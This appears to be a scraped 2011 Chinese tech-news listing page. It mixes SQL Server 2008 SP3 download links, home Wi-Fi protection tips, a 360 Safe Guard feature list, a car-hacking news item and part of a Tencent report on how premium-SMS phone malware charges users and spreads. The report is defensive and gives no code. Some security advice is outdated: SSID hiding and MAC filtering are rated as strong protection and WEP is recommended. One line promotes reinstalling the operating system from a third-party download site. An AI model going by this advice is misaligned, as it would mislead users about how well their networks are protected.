SQLEXPR32_x86(在32位和64位操作系統中均可安裝):95MB</strong></p><p><strong>  SQLEXPR_x86(可在 32 位操作系統中安裝):108MB</strong></p><p><strong>  SQLEXPR_x64:121MB</strong></p><p><strong>  SQL Server的所有其他版本:</strong></p><p><strong>  X86:312MB</strong></p><p><strong>  X64:379MB</strong></p><p><strong>  IA64:370MB</strong></p><p><strong>  簡體中文版官方下載:</strong></p><p><strong>&nbsp;<br />下載大?。?lt;br />下載下列文件<br />MicrosoftSQLServer2008SP3Readme.htm 15KB<br />SQLServer2008SP3-KB2546951-IA64-CHS.exe 370.8MB<br />SQLServer2008SP3-KB2546951-x64-CHS.exe 379.7MB<br />SQLServer2008SP3-KB2546951-x86-CHS.exe 312.3MB<br /><br /><br /></strong></p><p><strong>  SQL Server 2008 SP3:</strong></p><p><strong>  <a title="烈火提示:點擊查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?familyid=757bca07-7b52-46fb-ab92-476be9339442&amp;displaylang=zh-cn" target="_blank">http://www.microsoft.com/downloads/zh-cn/details.aspx?familyid=757bca07-7b52-46fb-ab92-476be9339442&amp;displaylang=zh-cn</a></strong> </p><p><strong>  SQL Server 2008 SP3 Express免費精簡版:</strong></p><p><strong>  <a title="烈火提示:點擊查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=15279834-6f7e-4c95-a772-921f771a9549" target="_blank">http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=15279834-6f7e-4c95-a772-921f771a9549</a></strong> </p><p><strong>  SQL Server 2008 SP3功能包:</strong></p><p><strong>  <a title="烈火提示:點擊查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=9ca6aac0-0dab-4da7-a2da-3e091ac3ee27" target="_blank">http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=9ca6aac0-0dab-4da7-a2da-3e091ac3ee27</a></strong></p><p><strong><a title="烈火提示:點擊查看" href="http://www.microsoft.com/downloads/zh-cn/details.aspx?FamilyID=9ca6aac0-0dab-4da7-a2da-3e091ac3ee27" target="_blank">&nbsp;<br /></a></strong> </p><strong><br /></strong><br /> [防護教程]如何防止蹭網蹭寬帶! 怎樣發現與防蹭網? http://www.pirinnaturalssoapandspa.com//html/13174_1.html 佚名 防護教程 2011/9/27 11:58:49 <p>高科技年代使用筆記本電腦、手機無線上網對無數人來說已是家常便飯,無線寬帶也已成為家庭上網的首選方式。據愛立信統計,全球使用無線服務用戶數已突破50億。然而,前不久各大媒體集中報道的“蹭網卡”,卻讓不少人對無線上網的安全性倍感憂慮。你家的無線寬帶是否被人“蹭”過?如何趕跑惡意的“蹭網小偷”很多人可能會認為,蹭網,不就是自己家的無線網絡被別人用一下么?千萬不要輕視“被蹭網”的危害。一旦你的私人網絡被不懷好意的人盯上,你就要想清楚是否能承受以下兩大風險: <br />1.網速被拖慢 <br /><br />由于上網帶寬是固定的(例如2M帶寬),被蹭網后必然會分流一部分帶寬,如果蹭網的設備進行文件下載、觀看在線視頻等操作,自己的網速可能會變得很慢。<br /><br />2.面臨安全隱私危機 <br /><br />蹭網成功后,蹭網的電腦就成為局域網中的網上鄰居,若他們再使用一些黑客工具,就很容易直接入侵到本機,從而可輕松盜取你上網中的所有私人信息和數據,惡劣后果可想而知。<br /><br />然而不必擔心 本人總結出了 一套安全設置的辦法 保證安全 對付一般類型的蹭網卡、和菜鳥黑客 搓搓有余!<br /><br />以下本人將按照安全級別和安全指數對比 為您介紹無線路由的設置 您可以根據情況設置!<br /><br />  1.不讓小偷盯上你<br /><br />  安全策略:隱藏你的無線網絡ID<br /><br />  安全指數:★★ <br /><br />  當你買了無線路由器在家布置了無線網絡后,你家里就有了一個Wi-Fi無線網絡環境了。打開你的筆記本或其他移動設備,尋找無線網絡時,就可以看到有很多網絡名字,這些名字就是服務設定標識(SSID)。<br /><br />  當你購買一個無線路由器后,默認的SSID一般都和該路由器的品牌相關聯。比如你買的是TP-Link,你的SSID號開始肯定以TP-Link開頭。一個黑客可以輕松通過你的SSID知道你的路由器品牌。你可以在無線路由的管理界面上,修改這個SSID,改成你喜歡的名字,這樣起碼可以在一定程度上隱蔽你的無線路由。<br /><br />  修改SSID只是最簡單的方式,我們還可以通過關閉SSID廣播來起到更好的效果。以Linksys管理界面為例,SETUP選項中,SSID Broadcast就可以選擇Disable,這樣就關閉了SSID。這樣你的無線網絡,對于一般人來說,就是隱蔽了。<br /><br />這時,在你自己的筆記本上,點擊“查看無線網絡”按鈕。以Windows XP為例,在修改高級設置鏈接中,然后點擊無線網絡配置標簽。在首選網絡部分點擊增加按鈕,然后輸入你修改后的SSID,點擊確認,你就可以連接到你的無線網絡中了。一般人不知道你的無線網絡SSID,所以安全性得到了一定提高。<br /><br /><br />  2.門前上個鎖<br /><br />  安全策略:加密你的無線網絡<br /><br />  安全指數:★★★<br /><br />  時下,一般無線路由都提供兩種加密標準:無線對等協議(WEP)和Wi-Fi保護接入(WPA)。WEP要比WPA老,但是不如WPA安全。目前網上流行的,“10分鐘可破解無線路由器密碼”,指的就是破解WEP密碼。所以,采用WPA會更安全些,起碼給黑客制造更多的麻煩。<br /><br />  設置加密后,需要無線上網的電腦上查看無線網絡屬性,在網絡密鑰對話框中輸入密碼,你的PC就可以連接到你的使用WPA加密的無線網絡了。<br /><br />  <br /><br />  3.篩選你的訪客<br /><br />  安全策略:使用MAC地址過濾<br /><br />  安全指數:★★★★<br /><br />  每一個網絡設備都有唯一的被稱作MAC地址的ID,一般是這種格式:00-D8-A1-40-9F-62。你可以利用他來據入侵者于門外。許多路由器允許你設定一個范圍的MAC地址可以接入到互聯網。這樣你可以告訴無線路由器哪些是你自己的PC的MAC地址,不屬于這個范圍的一律拒之門外。<br /><br />  如何查看自己電腦網卡的MAC地址的ID呢?在Windows系統中點選“開始菜單”,然后選“運行”,彈出的對話框中輸入“cmd ”,回車后會出現命令行窗口。在命令行窗口中輸入 ipconfig /all。尋找名為“Physical Address”的這一行,其后所顯示的地址即為該設備的MAC地址。<br /><br /><br />  <br /><br />  4.雇多個保安<br /><br />  安全策略:限定IP地址<br /><br />  安全指數:★★★★<br /><br />  當你的計算機連接到你的網絡中的時候,你的無線路由器通常會分給他一個IP地址,用他來瀏覽網頁或連接外部互聯網。通常情況下,無線路由器會給每一個連接到無線網絡中來的每一臺機器分配一個IP。<br /><br />  但是你可以告訴你的無線路由器只分配一定范圍的IP地址,假如你的網絡中的計算機使用了所有的IP地址的話,你的無線路由器就不會為入侵者再分配IP地址。<br /><br />  比如你家有兩臺無線上網電腦,你指定你的無線路由,只分配192.168.1.1至192.168.1.2,這樣當你的兩臺電腦都上網時,別人就無法再分配IP了,而如果你哪天發現自己的電腦分配不到IP,就知道你樓下的保安給小偷干掉了。 <br /><br />如果到這里問題還是沒有解決 那么強烈建議您到系統基地 www.7u5u.com 重新安裝系統 很可能是在你的系統里原生的植入了木馬或病毒<br /><br />按照上述設置后 基本已經非常安全了 還是不放心的話 可選擇 防蹭網的檢測小軟件如 360防蹭網 功能<br /><br />另外如果大家實在是 不懂無線路由的設置 或者其他原因沒辦法自己設置也可以選擇360安全衛士 在8.3新版推出的防蹭網的小軟件 筆者試過 對于新手朋友來講 很實用!<br /><br />下載安裝360安全衛士最新的8.3版 在主窗口右側找到并打開“流量防火墻”,選擇“防蹭網”選項卡,直接單擊“立即啟用”按鈕,它會自動檢測所有無線連接到路由器或是無線寬帶貓中的設備。如果列表中出現了“未知設備”,就需要提防了,如果該設備不是自己的電腦、手機,那極有可能就是蹭網的“小偷”(見圖2)。 <br /><br />360安全衛士下載</p><p>{insd m=&quot;2&quot; i=&quot;2855&quot;}<br /><br />圖2: “防蹭網”監測到疑似蹭網設備<br /><br />如果確定被蹭網,也不用過度擔心,只要單擊“修改密碼”按鈕,360流量防火墻會給出詳細的修改密碼方法(見圖3)。<br /><br /><br /><br />圖3:發現“被蹭網”后,360會指導用戶修改密碼<br /><br />據了解,大部分無線設備的設置頁面默認密碼都是“admin”,但也有部分品牌產品的賬號及密碼是其他字符,可以參考設備說明書或是直接以設備品牌及型號進行搜索。<br /><br />360安全專家提醒廣大用戶,使用無線路由器或是無線寬帶貓上網的情況下,一定要為無線信號加密,而且盡量設置復雜的密碼,防止別人破解。此外,配合360流量防火墻的防蹭網功能,實時監控蹭網行為,不僅可以保護自己的網速,還可以避免黑客攻擊等問題。<br /><br />新聞背景:何為“蹭網”?<br /><br />“蹭網”,主要是指在私人家庭無線網絡未加密的情況下,未經主人同意,主動盜用他人無線帶寬的一種行為。通過網上熱銷的無線“蹭網卡”設備,甚至可以**破解私人無線路由器密碼,強行使用他人無線網絡。系統城市整理.<br /><br /><br /></p> [安全產品]360安全衛士8.3最新版完整功能體驗 http://www.pirinnaturalssoapandspa.com//html/13173_1.html 西西 安全產品 2011/9/27 11:41:16 <p>&nbsp;<strong>【功能大全——360性能體檢】</strong><br /><br />  凌晨兩點,端坐在電腦前看歐冠,梅西帶球突入禁區,晃過最后一個后衛,起腳打門,咣,電腦卡死了!進了嗎?!不知道!坑爹啊有木有!摔電腦的心都有了有木有!電腦又卡又慢的人你傷不起??!<br /><br />  ——相信很多人都有以上“電腦卡、慢得想摔”的經驗,但絕大多數人對此束手無策。電腦究竟為什么會越變越慢呢?想知道原因?<br /><br />  現在,360安全衛士全新推出“360性能體檢”,可以一鍵幫您檢測電腦開機的時間,并對你的硬件進行評分,檢測當前網絡的性能,替你揪出讓電腦變慢的真兇!<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271129526762.jpg" alt="" /><br /><br />  <strong>【云查殺】</strong><br /><br />  1、更新啟發式引擎病毒庫,提升查殺效率;<br /><br />  2、優化信任區的使用效率。<br /><br />  <strong>【軟件管家】</strong><br /><br />  增加對手機助手Android、iPhone版支持,應用輕松下<br /><br />  <strong>【網盾】</strong><br /><br />  主頁鎖定提示進一步優化,更直觀方便的修改已鎖定的主頁<br /><br />  <img src="https://pic.cr173.com/up/2011-9/2011092711285863181.jpg" alt="" /><br /><br />  <strong>【系統修復】</strong><br /><br />  1、插件清理掃描速度優化;<br /><br />  2、增加瀏覽器二級頁面打不開的修復;<br /><br />  3、增加桌面圖標大小、圖標間距異常的修復。<br /><br />  <strong>【云查殺】</strong><br /><br />  深度掃描電腦上已安裝的軟件,及時發現被感染、篡改的軟件文件及其他潛在風險,保證常用軟件安全。<br /><br />  <strong>【網購保鏢】</strong><br /><br />  1、網購保鏢界面優化關閉按鈕;<br /><br />  2、修正主程序界面網購保鏢點擊一鍵開啟后,防護未完全開啟的問題。<br /><br />  <strong>【360云恢復】</strong><br /><br />  在使用電腦的過程中,隨時可能出現死機、硬件損壞、系統崩潰需要重裝等意外故障。<br /><br />  這些意外會導致上網賬號,系統設置,常用軟件等重要資料丟失。輕則耽誤時間重新設置,重新安裝軟件,重則丟失上網賬號無法上網,丟失收藏的網站等等。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271130146779.png" alt="" /><br /><br />  360云恢復提供無限免費空間,為您可靠保存支持一鍵備份和恢復系統核心文件、IE首頁、IE收藏夾、桌面壁紙、ADSL賬號、Host設置、應用軟件等重要數據。即便電腦遇到意外或者重裝系統,也能快速將資料恢復,避免損失。<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/832_614/25/01/b3/2501b3bq1084.1d539c.png" alt="" /><br /><br />  <strong>【360(91)手機助手安卓版】</strong><br /><br />  1、全新設計的logo和界面,清新自然,富有科技感;<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/990_710/27/01/c3/2701c3dq10e6.00e86d.png" alt="" /><br /><br />  2、支持更多的機型,能識別出更多android機型,增加大量手機驅動,插上電腦即可自動完成驅動安裝和連接的過程;<br /><br />  3、新增視頻、圖片管理功能,讓您方便的查看、導入、導出手機中的照片、電影等資料;電影下載站、壁紙大全即將上線;<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271132219577.png" alt="" /><br /><br />  4、優化任務管理功能,增加狀態欄任務進度條顯示;<br /><br />  5、增加apk文件關聯設置,在電腦中雙擊手機應用安裝包文件即可一鍵安裝到手機;<br /><br />  6、用戶可自由選擇安裝應用到手機中或SD卡里(僅支持Android2.2以上固件);<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271132304935.png" alt="" /><br /><br />  7、新增手機系統應用管理功能,可查看手機自帶的系統應用,并支持系統應用的升級和還原;<br /><br />  8、超大超全的資源庫,提供更加海量的應用、軟件、音樂等資源;<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/990_710/26/02/39/260239q1081.ec5472.png" alt="" /><br /><br />  9、增加話費充值功能,可隨時給手機充值,還能打折哦;<br /><br />  10、新增用戶反饋入口,方便您及時與我們進行溝通,快速解決您使用中的問題。<br /><br />  <strong>【網盾】</strong><br /><br />  1、網購保鏢界面、下載保護界面重構<br /><br />  2、網購模式調整:淘寶等常用購物網站進入保護但不掃描<br /><br />  <strong>【開機加速】</strong><br /><br />  1、開機小助手使用新皮膚;<br /><br />  2、優化我的開機時間的顯示和提示信息,更全面。<br /><br />  <strong>【云查殺】</strong><br /><br />  1、完善對云查詢緩存的處理,提升查詢速度;<br /><br />  2、提升清除黑DNS的性能;<br /><br />  3、增加威金病毒新變種的專殺。<br /><br />  <strong>【系統修復】</strong><br /><br />  1、增強32/64位系統的修復能力,修復更全面<br /><br />  2、新增系統桌面被禁用的修復<br /><br />  3、新增系統右鍵無法新建“文本文檔”的修復<br /><br />  4、新增IE腳本支持組件被劫持的修復<br /><br />  5、增強Internet選項的修復<br /><br />  6、增強系統無法關閉的修復<br /><br />  7、增強可執行文件無法打開的修復<br /><br />  <strong>【木馬防火墻】</strong><br /><br />  強化黑客入侵防護,增加攔截規則,阻止黑客創建用戶賬戶,利用微軟SQLServer和MySQL漏洞入侵等行為。<br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/480_340/20/01/a1/2001a14qeb0.09e6ad.png" alt="" /><br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/480_340/2a/01/92/2a01924qed4.796a17.png" alt="" /><br /><br />  <img src="http://t1.qhimg.com/qhimg/jingyan/480_340/25/02/14/2502142qf3a.527729.png" alt="" /><br /><br />  <strong>【優化加速】</strong><br /><br />  增加“我的開機時間”Tab頁面<br /><br />  1、增加圖形化效果展示每個啟動項目的開機時間占用;<br /><br />  2、增加“曬開機時間到微博”功能;<br /><br />  3、增加“一鍵優化”結果頁面,百分比直觀顯示本次優化后的效果。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/2011092711290677573.jpg" alt="" /><br /><br />  <strong>【系統修復】</strong><br /><br />  1、解決桌面圖標被放大或縮小的問題;<br /><br />  2、增強瀏覽器二級頁面打不開的修復;<br /><br />  3、增強快捷方式無法打開的修復;<br /><br />  4、全面支持Win764位。<br /><br />  5、增加快捷方式屬性無法查找目標的修復,更完善。<br /><br />  6、優化修復邏輯,解決了兩處可能引起程序崩潰的隱患<br /><br />  7、360電腦門診增加系統字體,瀏覽器無法輸入文字等問題的修復;<br /><br />  8、增強對64位系統的支持,修復更全面。<br /><br />  9、主界面增加“主頁鎖定”功能,幫助您快速鎖定主頁,防止被惡意程序篡改<br /><br />  <strong>【功能大全——360閃電云鑒定器】</strong>(點擊查看360閃電云鑒定器詳細介紹 )<br /><br />  360閃電云鑒定器基于360安全中心獨創的“云QVM”技術,能在極短時間內鑒定最新病毒,絕大部分文件甚至都不需要上傳。運用領先的“云QVM”鑒定技術,僅需獲取文件的微小信息點,就可鑒定最新病毒文件。無論病毒采用何種加殼、變形技術,都難逃云鑒定器的“閃電慧眼”。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/2011092711290727624.jpg" alt="" /><br /><br />  <strong>【360手機助手】</strong><br /><br />  1、修復了部分用戶安裝驅動失敗的問題<br /><br />  2、優化了設備的連接識別過程,增加電池充滿提醒,體驗更加友好<br /><br />  3、支持更多手機型號,增加了大量手機型號圖片,手機型號識別更準確<br /><br />  4、開放平臺增加應用匯、多米音樂、91文學站等第三方資源,提供更豐富的資源下載<br /><br />  5、增加手機聯系人、短信備份/恢復功能<br /><br />  6、增加應用升級功能<br /><br />  7、新功能需安裝360手機衛士,手機安全更有保障<br /><br />  8、優化了驅動安裝方式,修復了部分用戶安裝驅動失敗的問題;<br /><br />  9、增加了安裝本地應用的功能,方便用戶安裝電腦中的應用安裝包到手機中;<br /><br />  10、增加了手機音樂和電子書管理功能;<br /><br />  11、優化了手機聯系人、短信備份/恢復功能;<br /><br />  12、開放平臺增加機鋒市場,提供更豐富的軟件、游戲的下載。<br /><br />  <strong>【功能大全——360任務管理器】</strong><br /><br />  1、幫助您詳細了解和查看各系統進程、系統服務,讓任務管理器更簡單易懂;<br /><br />  2、幫助您便捷關閉各系統進程、系統服務,同時優化內存,加快電腦運行速度;<br /><br />  3、方便您實時掌握電腦資源利用狀況,系統性能一目了然。<br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271133084483.png" alt="" /><br /><br />  <img src="https://pic.cr173.com/up/2011-9/20119927271132584408.png" alt="" /></p> [網絡安全]如何保證您的無線網絡不被入侵 http://www.pirinnaturalssoapandspa.com//html/13122_1.html 佚名 網絡安全 2011/9/21 9:30:35 &nbsp;越來越多的無線產品正在投入使用,無線安全的概念也不是風聲大雨點小,不論是咖啡店、機場的無線網絡,還是自家用的無線路由都已經成為了黑客進攻的目標。那么如何才能保證自己的無線安全呢?首先,必須控制進入網絡的資格,即認證;其次,保護以無線方式發送的信息,即數據加密。 <br /><br />  那么我們通過Com公司提供的防止黑客攻擊的十條對策,談論如何保證無線安全。 <br /><br />  1.正確放置網絡的接入點設備 <br /><br />  從基礎做起:在網絡配置中,要確保無線接入點放置在防火墻范圍之外。 <br /><br />  2.利用MAC阻止黑客攻擊 <br /><br />  利用基于MAC地址的ACLs(訪問控制表)確保只有經過注冊的設備才能進入網絡。MAC過濾技術就如同給系統的前門再加一把鎖,設置的障礙越多,越會使黑客知難而退,不得不轉而尋求其他低安全性的網絡。 <br /><br />  3.有效管理無線網絡的ID <br /><br />  所有無線局域網都有一個缺省的SSID(服務標識符)或網絡名。立即更改這個名字,用文字和數字符號來表示。如果企業具有網絡管理能力,應該定期更改SSID。不要到處使用這個名字:即取消SSID自動播放功能。 <br /><br />  4.WEP協議的重要性 <br /><br />  WEP是802.11b無線局域網的標準網絡安全協議。在傳輸信息時,WEP可以通過加密無線傳輸數據來提供類似有線傳輸的保護。在簡便的安裝和啟動之后,應立即更改WEP密鑰的缺省值。最理想的方式是WEP的密匙能夠在用戶登錄后進行動態改變,這樣,黑客想要獲得無線網絡的數據就需要不斷跟蹤這種變化?;跁捄陀脩舻腤EP密?管理技術能夠實現最優保護,為網絡增加另外一層防范,確保無線安全。 <br /><br />  5.WEP協議不是萬能的 <br /><br />  不能將加密保障都寄希望于WEP協議。WEP只是多層網絡安全措施中的一層,雖然這項技術在數據加密中具有相當重要的作用,但整個網絡的安全不應該只依賴這一層的安全性能。但許多網絡管理員很難接受這個觀點。 <br /><br />  6.VPN是最好的網絡安全技術之一 <br /><br />  如果每一項安全措施都是阻擋黑客進入網絡前門的門鎖,如SSID的變化、MAC地址的過濾功能和動態改變的WEP密?,那么,虛擬網(VPN)則是保護網絡后門安全的關鍵。VPN具有比WEP協議更高層的網絡安全性(第三層),能夠支持用戶和網絡間端到端的安全隧道連接。 <br /><br />  7.提高已有的RADIUS服務 <br /><br />  大公司的遠程用戶常常通過RADIUS(遠程用戶拔號認證服務)實現網絡認證登錄。企業的IT網絡管理員能夠將無線局域網集成到已經存在的RADIUS架構內來簡化對用戶的管理。這樣不僅能實現無線網絡的認證,而且還能保證無線用戶與遠程用戶使用同樣的認證方法和帳號。 <br /><br />  8.簡化網絡安全管理:集成無線和有線網絡安全策略 <br /><br />  無線網絡安全不是單獨的網絡架構,它需要各種不同的程序和協議。制定結合有線和無線網絡安全的策略能夠提高管理水平,降低管理成本。例如,不論用戶是通過有線還是無線方式進入網絡時,都采用集成化的單一用戶ID和密碼。 <br /><br />  9.WLAN設備不全都一樣 <br /><br />  盡管802.11b是一個標準的協議,所有獲得WiFi標志認證的設備都可以進行基本功能的通信,但不是所有這樣的無線設備都完全對等。雖然WiFi認證保證了設備間的互操作能力,但許多生產商的設備都不包括增強的網絡安全功能。 <br /><br />  10.不能讓非專業人員構建無線網絡 <br /><br />  盡管現在無線局域網的構建已經相當方便,非專業人員可以在自己的辦公室安裝無線路由器和接入點設備,但是,他們在安裝過程中很少考慮到網絡的安全性,只要通過網絡探測工具掃描網絡就能夠給黑客留下攻擊的后門。因而,在沒有專業系統管理員同意和參與的情況下,要限制無線網絡的構建,這樣才能保證無線安全。 <br /><br /> [黑客攻防]黑客演示一分鐘短信偷汽車 http://www.pirinnaturalssoapandspa.com//html/12915_1.html 佚名 黑客攻防 2011/8/23 10:12:37 <p>&nbsp;<span style="color:#000000;">黑帽網絡安全會議本月早些時候描述了兩名來自iSEC的合作伙伴可以利用手機偷竊汽車,這兩位名叫Don Bailey和Mat Solnik的安全研究人員今天通過網絡視頻演示了如何攻入一臺鎖上的斯巴魯汽車。首先他們要了解一臺特定汽車(必須配備車載手機或衛星報警系統裝置的汽車)內置的電話號碼,只需要用手機向汽車發送一條特別設計過的文字信息命令,汽車即可被解鎖和啟動。<br/><br/>雖然他們并不能隨便就能偷到車(因為必須獲得特定的汽車號碼和衛星識別碼),但這次演示的價值在于文本信息并不是那么容易被阻止,因此使用短信來與呼叫服務中心進行聯絡的汽車始終有隱患。<br/><br/>再擴展開來,無線系統并不僅僅在汽車上應用,大量的監控與數據采集系統(SCADA)經常也采用無線功能進行聯絡,這些設備涉及核電力工廠、水處理設施等,這些關鍵基礎設施如可以被遠程攻擊,則后果不堪設想。<br/><br/>iSEC并不是唯一的研究黑汽車的小組,《科學美國人》四月份曾報道美國加州大學圣迭戈分校的研究人員同樣聲稱可以通過車載藍牙和電話連接系統打開車鎖并啟動發動機,甚至還可以控制單個車輪的剎車等。觀看:<span style="BACKGROUND-COLOR: rgb(229,236,244)"><span style="font-family:Verdana;"><span style="FONT-SIZE: 14px"><a href="http://www.youtube.com/watch?v=bNDv00SGb6w&feature=player_embedded" target="_blank">iSEC Partners presents: The Hacked and the Furious</a></span></span></span><br/><br/></span></p> [病毒漏洞]騰訊移動安全實驗室公布手機吸費病毒的工作原理 http://www.pirinnaturalssoapandspa.com//html/12865_1.html 西西 病毒漏洞 2011/8/17 10:02:23 <p>隨著移動互聯網的快速發展,手機吸費病毒作為一種新的手機病毒形式開始進入人們的視線。<strong>“吸費海盜王”、“美女勾魂吸費大盜”等吸費病毒近期陸續被騰訊移動安全實驗室等手機安全機構公之于眾,</strong>被查獲的病毒不僅覆蓋了Android、Symbian V3 V5等智能機操作系統、也覆蓋了Kjava等功能手機操作系統。吸費病毒的頻繁出現,引發手機用戶不同程度上的疑慮和對移動安全的擔憂。</p><p>騰訊移動安全實驗室最新的網絡調研數據顯示,26%的用戶遭遇過手機病毒,而38%的用戶對于手機病毒最大的擔心在于扣費、吸費。對于手機吸費病毒的成因、吸費原理、傳播方式、產業鏈狀況、以及規避對策等相關知識,73%的被調研用戶表示希望了解。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710230727.png" />&nbsp;<img alt="" src="https://pic.cr173.com/up/2011-8/201181710231727.png" /></p><p>為了幫助用戶更好的了解手機安全,解答手機用戶關于吸費病毒的各類疑問,更好地保護用戶手機安全,騰訊移動安全實驗室專家采用專業的技術手段,對手機吸費病毒的相關信息進行全方位的解讀、定位和剖析,并形成了實驗室首份移動安全報告——《揭開手機吸費病毒的神秘面紗》,以饗讀者。</p><p>{insd m=&quot;2&quot; i=&quot;17294&quot;}</p><p>本報告所有內容均為騰訊移動安全實驗室及旗下QQ手機管家、在線查毒平臺、惡意線索舉報平臺通過對各類吸費病毒樣本和病毒產業鏈進行細致研究后所得成果,如有引用,請注明出處。</p><p><strong>第二章:吸費病毒原理</strong></p><p>騰訊移動安全實驗室發現,吸費病毒的主要原理是通過自行發短信、拔打語音扣費電話,同時會刪除或屏蔽收費相關的運營商回執短信、拔打電話、Wap上網等記錄,讓用戶完全在不知不覺中被扣費。</p><p>2.1&nbsp;&nbsp;短信業務的扣費原理:</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231865.png" /></p><p>(圖1)短信業務扣費原理示意圖</p><p>2.2&nbsp;&nbsp;聲訊/IVR業務的扣費原理:在手機后臺自動撥打IVR電話,然后把撥打的相應記錄</p><p>刪除。</p><p>2.3 WAP業務的扣費原理:自動后臺點擊扣費節點。</p><p>2.4其他運營商增值業務的扣費原理:彩鈴/炫鈴/七彩鈴的下載,采用短信、或IVR、</p><p>或WAP訂購的方式。</p><p><strong>第三章:病毒的傳播途徑</strong></p><p>騰訊移動安全實驗室研究發現,目前手機吸費病毒一般以嵌入正常功能軟件、熱門軟件為主要載體,散播在眾多論壇、電子市場、刷機ROM里,用戶把這當作原版、加強版、破解版、美化版進行下載。</p><p><strong>3.1&nbsp;&nbsp;載體偽裝途徑:</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;嵌在其他熱門的正常軟件里:嵌在知名游戲軟件、工具軟件中</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;專門開發出一種帶功能性的免費軟件,把病毒嵌入</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;扣費病毒不立即安裝,先安裝一個木馬病毒,待用戶量一定的時候,通過服務器給指令下載相關的扣費病毒,靜默安裝</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iv.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;偽裝在主題類軟件中,這是塞班最為常見的病毒載體</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;偽裝為系統升級軟件,諾基亞手機上經常出現</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;vi.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;偽裝為殺毒軟件,以前曾出現過偽360、偽卡巴等</p><p><strong>3.2&nbsp;&nbsp; 多種傳播方式:</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;群發內容為類似運營商發送的服務短信,短信內有鏈接,鏈接域名搞成類似運營商網址迷惑用戶,如“偽升級扣費木馬”,就使用http://1OO86.net(用字母O來偽裝數字0)的域名來提供下載。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;在嵌入到多個熱門軟件后,把這些軟件散布到各熱門手機論壇與電子市場中,再運作一些破解、優化、美化、漢化、必裝等字眼來誘惑用戶下載安裝,用戶防不勝防。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;